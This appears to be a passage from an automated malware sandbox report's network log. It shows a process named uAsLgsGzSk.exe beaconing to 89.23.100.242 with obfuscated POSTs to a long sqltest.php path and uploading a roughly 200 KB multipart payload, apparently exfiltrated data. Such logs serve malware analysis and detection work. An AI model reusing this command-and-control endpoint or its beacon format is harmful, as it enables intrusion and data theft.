                                                                                                Jan 10, 2025 07:57:51.079622030 CET2544OUTData Raw: 5c 55 43 5e 5e 5e 56 56 58 5b 57 56 50 58 5b 52 55 51 5e 5f 54 58 51 5e 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \UC^^^VVX[WVPX[RUQ^_TXQ^RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$;$>.:?Y;:><.8+85(##Z*>@$-3'_!/Y.%


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                18192.168.2.44975989.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:51.226663113 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2032
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:57:51.579586983 CET2032OUTData Raw: 59 56 43 5f 5e 5c 53 57 58 5b 57 56 50 5c 5b 54 55 52 5e 5d 54 5e 51 53 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YVC_^\SWX[WVP\[TUR^]T^QSRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$83\+="<[,\.<(\(8;6' *#)2>;0'_!/Y.
                                                                                                Jan 10, 2025 07:57:51.993340015 CET374INHTTP/1.1 100 Continue
                                                                                                Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 35 37 3a 35 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 39 38 0d 0a 0f 1e 3a 0e 20 3b 06 1e 25 06 3e 0a 39 01 32 0b 2b 1e 3c 59 2a 3e 30 03 29 1d 2c 0f 2e 01 37 55 20 28 3a 07 3c 22 3e 50 27 5a 34 55 25 1d 21 59 0c 13 26 10 2b 14 03 1e 3d 2a 02 1c 2b 31 3d 1b 30 55 20 07 27 13 03 18 23 01 30 5e 3c 39 2e 0c 3c 0f 25 1f 39 3a 38 5a 3e 3c 3f 0c 27 26 2a 57 0c 1f 26 53 21 31 36 09 36 1c 26 12 33 16 27 53 33 3b 2c 50 32 06 34 04 34 3a 27 1d 3a 00 3c 1f 22 10 2c 12 2a 2e 3d 0c 35 32 20 50 2b 06 20 51 22 0d 22 50 [TRUNCATED]
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 10 Jan 2025 06:57:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding98: ;%>92+<Y*>0),.7U (:<">P'Z4U%!Y&+=*+1=0U '#0^<9.<%9:8Z><?'&*W&S!166&3'S3;,P244:':<",*.=52 P+ Q""P0]Q0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                19192.168.2.44976089.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:51.383697987 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:57:51.736162901 CET2544OUTData Raw: 59 5e 43 57 5e 5f 56 50 58 5b 57 56 50 53 5b 56 55 5d 5e 5e 54 5d 51 5c 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: Y^CW^_VPX[WVPS[VU]^^T]Q\RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR',;]>.&+?/U?\)(Y!$,*3?Y*,=%=,&:'_!/Y.
                                                                                                Jan 10, 2025 07:57:52.125248909 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:57:52.278945923 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:57:52 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                20192.168.2.44976189.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:52.411108971 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2536
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:57:52.767134905 CET2536OUTData Raw: 5c 54 46 57 5b 5b 56 56 58 5b 57 56 50 5b 5b 52 55 5c 5e 5d 54 5a 51 5b 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \TFW[[VVX[WVP[[RU\^]TZQ[RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'B8/?-[(6;/9(=$\+86,(3/=:B&#3'_!/Y.-
                                                                                                Jan 10, 2025 07:57:53.150372982 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:57:53.277571917 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:57:53 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                21192.168.2.44976289.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:53.472232103 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2536
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:57:53.829628944 CET2536OUTData Raw: 5c 53 43 56 5b 5d 56 50 58 5b 57 56 50 5b 5b 5a 55 56 5e 5b 54 5d 51 5a 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \SCV[]VPX[WVP[[ZUV^[T]QZRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'C/1?(=<<Z;!+=(0Y"7'</Z=:243'_!/Y.
                                                                                                Jan 10, 2025 07:57:54.220063925 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:57:54.350802898 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:57:54 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                22192.168.2.44976389.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:54.522531033 CET577OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: multipart/form-data; boundary=----s4VOHFAR20G8vVPIwClEHtRE0DwTdOyX8p
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 204914
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:57:54.876604080 CET12360OUTData Raw: 2d 2d 2d 2d 2d 2d 73 34 56 4f 48 46 41 52 32 30 47 38 76 56 50 49 77 43 6c 45 48 74 52 45 30 44 77 54 64 4f 79 58 38 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                                                Data Ascii: ------s4VOHFAR20G8vVPIwClEHtRE0DwTdOyX8pContent-Disposition: form-data; name="0"Content-Type: text/plainYSFT[\SPX[WVP_[RUW^^TPQZRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^
                                                                                                Jan 10, 2025 07:57:54.881937981 CET4944OUTData Raw: 6e 72 6d 32 36 54 79 53 42 4e 68 77 50 78 6d 2b 56 31 50 44 33 50 58 30 73 30 39 46 43 49 7a 54 78 70 76 4e 30 4d 66 6d 38 73 33 50 36 6e 4d 4a 7a 48 47 54 6b 7a 5a 79 35 2b 4f 71 53 76 45 46 36 38 47 6e 34 64 71 49 79 59 48 70 4d 45 5a 72 63 52
                                                                                                Data Ascii: nrm26TySBNhwPxm+V1PD3PX0s09FCIzTxpvN0Mfm8s3P6nMJzHGTkzZy5+OqSvEF68Gn4dqIyYHpMEZrcReBNyuRL9qq71qPe7cVvW95CZq6rH69ieulhX9+T5wBLeKWWD3I8hKXGxXzaMoyitYO2eorCp4MOM29RpWF/zkJ8Gu9t8o9nzQedUMhbrstrHuIg4GDy1XkZruY5HF365qXi13IxNjvL+aN/NPKEonmdCKP1p5fGPX
                                                                                                Jan 10, 2025 07:57:54.881988049 CET4944OUTData Raw: 76 7a 49 65 72 4a 65 79 70 61 6f 61 61 6d 41 33 6b 4c 4a 30 6c 37 4b 62 41 51 54 77 4c 67 71 6d 48 39 46 4a 5a 73 65 6f 73 56 36 4a 57 6e 30 37 4f 31 69 6f 6d 6a 59 2b 75 6f 37 62 46 73 67 69 4c 4f 6b 56 38 6c 48 77 37 49 5a 63 55 30 6f 41 6f 66
                                                                                                Data Ascii: vzIerJeypaoaamA3kLJ0l7KbAQTwLgqmH9FJZseosV6JWn07O1iomjY+uo7bFsgiLOkV8lHw7IZcU0oAof31RBLo1XNw3PU4Ck7fY1T4bjWA5gGdvDUvPn43E3TWUs0QTjJqpPxx31A0nB5KjPFaUk2nzBzGGiBUGusgvNvQ1u0VFRpdW9z8e04qqvfH6GOUCo06pCwFChyjhsJ3wRWNDy+Lod+wT80hAVc6Ig6YtvNTllPzwIv
                                                                                                Jan 10, 2025 07:57:54.882024050 CET2472OUTData Raw: 63 48 62 68 54 68 76 6c 47 5a 70 79 5a 45 4a 30 69 76 4b 76 52 4e 53 46 65 68 7a 6b 74 6e 2b 4f 67 6e 61 36 30 6c 36 6a 36 34 4f 70 4a 56 4c 34 34 7a 4f 35 67 6b 65 35 37 66 32 7a 35 4a 50 6b 44 4f 34 33 70 7a 78 35 4e 54 30 55 4b 46 61 52 31 54
                                                                                                Data Ascii: cHbhThvlGZpyZEJ0ivKvRNSFehzktn+Ogna60l6j64OpJVL44zO5gke57f2z5JPkDO43pzx5NT0UKFaR1TzDJTqOPPXXrHM1S82EnNg+qbO7iJ/wC4nYePPQBrbXMLOVO7ARJTNoVpvOPvywI7g36I/SYOvrxoef92zQsdGxRV/t/DGspcxvmq1gt9kM7G+VVvrZHZ5Xl4POVVXEzdMIxU2IHkW1skpeo9LVYufy7U+dmJYXrIs
                                                                                                Jan 10, 2025 07:57:54.882052898 CET2472OUTData Raw: 50 66 38 75 34 34 6b 4a 2f 73 45 37 70 6b 2b 54 30 68 4b 4c 4f 73 37 4e 30 48 4b 64 5a 77 66 51 58 4c 46 58 6f 50 4c 4a 47 38 2b 4c 32 2f 6f 4c 55 56 39 69 5a 2f 76 63 2f 65 4c 36 6e 31 54 33 4e 38 66 75 61 48 2b 4b 66 79 62 32 51 6c 74 43 6c 77
                                                                                                Data Ascii: Pf8u44kJ/sE7pk+T0hKLOs7N0HKdZwfQXLFXoPLJG8+L2/oLUV9iZ/vc/eL6n1T3N8fuaH+Kfyb2QltClwpy8cqzhvWfFJScRQrKOcXjr/8HVd8dz9b/xX1V0UFbFW2oUXuv0tpF29gzihq1lVDUJmpVjab2plZJjGqo2mq1iL1iFqW1R1F7hTyJ9vt7nuePeDXJzb036eec8z7nvM/7w/xw5N1JcD5LUGTDDQ/b6NhtoFUF95W
                                                                                                Jan 10, 2025 07:57:54.882085085 CET2472OUTData Raw: 58 76 51 71 6d 44 33 39 30 6c 6a 48 71 2b 4b 2b 61 6f 69 38 6f 77 4a 2b 4a 74 74 6a 6f 48 47 6c 6b 35 4d 2f 76 46 50 72 35 65 67 37 59 78 4a 39 44 77 34 4f 44 70 6a 7a 55 69 4e 61 79 7a 54 55 56 6a 47 44 2b 32 76 72 6c 44 53 38 63 57 74 4a 41 64
                                                                                                Data Ascii: XvQqmD390ljHq+K+aoi8owJ+JttjoHGlk5M/vFPr5eg7YxJ9Dw4ODpjzUiNayzTUVjGD+2vrlDS8cWtJAd3mwhySP3g7MarI4bzbU6GEl32lThy6kiuviz5hPD/jgRcj861r0TjOtCGX7/Z8ruiX53s8QwW+XZT8Pk8arfAlWtfQMWes3IaeIXhoPz/A2vAk+feU2foJH1fiYyetd+4EcO6RjtVBzH0vad4lq6zxY3l5/+5bmzo
                                                                                                Jan 10, 2025 07:57:54.882107973 CET2472OUTData Raw: 79 68 51 67 51 72 4d 71 6a 2b 57 68 5a 37 54 56 6a 34 61 47 4a 76 59 33 58 63 62 48 32 78 61 30 4f 44 33 7a 35 48 74 4a 75 4f 4c 62 35 42 33 4d 54 71 2b 56 58 4d 4d 44 2f 52 4a 34 59 48 6f 4a 44 78 78 38 2b 4a 62 48 47 38 6e 6a 32 71 74 76 71 38
                                                                                                Data Ascii: yhQgQrMqj+WhZ7TVj4aGJvY3XcbH2xa0OD3z5HtJuOLb5B3MTq+VXMMD/RJ4YHoJDxx8+JbHG8nj2qtvq8dwg7XcZ/lrubmOMR74E+L99jSojRBBlfBAqx6V2qOh8mihtRGMkPD1RqlKl4gTrMuQv4dIm8Xc77y3SU/fIlzdf8RmQARoh1wIq/as2kGwMx2iLttfqi7Bnv7xds/R/1vMZz8e5t+vqEtyxpN78Pf2ETyBOorcM4G
                                                                                                Jan 10, 2025 07:57:54.882143974 CET2472OUTData Raw: 44 64 33 4e 74 76 4c 46 2b 6f 4e 6d 52 44 57 79 4c 61 4a 34 52 44 5a 61 68 52 51 4f 39 72 4b 50 39 70 44 53 6b 5a 49 67 5a 73 32 78 62 4b 78 74 31 56 61 32 48 58 66 32 66 6d 34 39 36 64 55 74 6d 42 54 7a 71 71 70 62 4b 39 64 49 53 73 74 65 44 37
                                                                                                Data Ascii: Dd3NtvLF+oNmRDWyLaJ4RDZahRQO9rKP9pDSkZIgZs2xbKxt1Va2HXf2fm496dUtmBTzqqpbK9dISsteD7htJNpIDg1woRgL7ZqyrTSVDvph8N3c6mzyGLkTd3rTrBN7zQRKUcQDkVG0oE8PqMlJ1m4FpjITj9uWp4CrQ7e8cyVkAnjJOej2UKCUntukpxAuI1NumZ1sS+ZuLHQHyVROKbKsMti4qDZ0SRWQJtx7m71JlqoIgpy
                                                                                                Jan 10, 2025 07:57:54.882251024 CET2472OUTData Raw: 43 51 70 6a 56 53 64 53 5a 67 74 4c 36 41 33 31 56 4e 65 48 33 56 58 73 2f 4a 4a 49 45 55 76 7a 46 62 4a 6f 37 75 32 71 58 43 30 4e 6d 63 7a 36 32 49 69 37 59 44 77 77 6a 69 75 51 69 68 65 5a 6f 48 7a 65 73 32 48 51 30 4f 61 6b 64 5a 53 41 2b 2f
                                                                                                Data Ascii: CQpjVSdSZgtL6A31VNeH3VXs/JJIEUvzFbJo7u2qXC0Nmcz62Ii7YDwwjiuQiheZoHzes2HQ0OakdZSA+/DoDRv4EekSH/jFj/sOnUZMa87X7bb8V68c1o1X/WxsD/3OyfZybZtp2DIpnnbj15+hP3/m8j5G92zLDNKkzjCxXV/HA+e/sIMuGfG59RIWp7rOC+k10pb+KSVGVO9YMYhMFyd0SjGep3W9sN7b7LeBv3qIHjvTo8L
                                                                                                Jan 10, 2025 07:57:54.887125015 CET2472OUTData Raw: 30 4a 74 58 78 70 41 39 5a 6d 4a 6b 74 6a 55 32 35 42 4a 79 4b 71 74 76 68 35 4b 2f 48 41 46 45 62 65 6b 36 4c 74 55 66 36 7a 42 63 75 64 4e 6c 37 44 67 36 69 4d 75 61 34 6c 6e 77 63 57 76 38 34 6e 63 45 78 77 4e 70 78 35 47 50 36 72 78 76 4e 38
                                                                                                Data Ascii: 0JtXxpA9ZmJktjU25BJyKqtvh5K/HAFEbek6LtUf6zBcudNl7Dg6iMua4lnwcWv84ncExwNpx5GP6rxvN8Q0pFrcmYA9cTiWE+ZTuVwWcWEylJ0yo75G7OGLkDtbj8BxmlgAR0F7UcNS7bjoy9tjX0wt9cWQH0hRiq2vF14sKcpzxXb0iXXcHjblDHG2UFYXoEj6VEBCh/uWSxr9LmsQ5WHBY2lXo2q/vy1RuvvnSSL4m0mh4PQ
                                                                                                Jan 10, 2025 07:57:55.275729895 CET25INHTTP/1.1 100 Continue


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                23192.168.2.44976489.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:54.547162056 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:57:54.892357111 CET2544OUTData Raw: 59 53 46 53 5e 5a 53 57 58 5b 57 56 50 58 5b 50 55 50 5e 52 54 59 51 5e 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YSFS^ZSWX[WVPX[PUP^RTYQ^RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$; <>=[+&/;\2<=(8$Z67U+7)?"14X$'_!/Y.%
                                                                                                Jan 10, 2025 07:57:55.295809984 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:57:55.449727058 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:57:55 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                24192.168.2.44976589.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:55.582652092 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:57:55.939254045 CET2544OUTData Raw: 5c 56 43 57 5b 5d 56 52 58 5b 57 56 50 5e 5b 51 55 56 5e 53 54 51 51 58 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \VCW[]VRX[WVP^[QUV^STQQXRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'/(>&>%$-:R?=((<Z"4+3>?F&'0'_!/Y.=
                                                                                                Jan 10, 2025 07:57:56.344883919 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:57:56.478418112 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:57:56 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                25192.168.2.44976789.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:56.597197056 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:57:56.954626083 CET2544OUTData Raw: 5c 55 43 55 5e 5b 56 51 58 5b 57 56 50 5c 5b 5b 55 5c 5e 53 54 5a 51 5b 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \UCU^[VQX[WVP\[[U\^STZQ[RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR';;[(=(5;;9%W?=](467W<+X)Y!%#':'_!/Y.


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
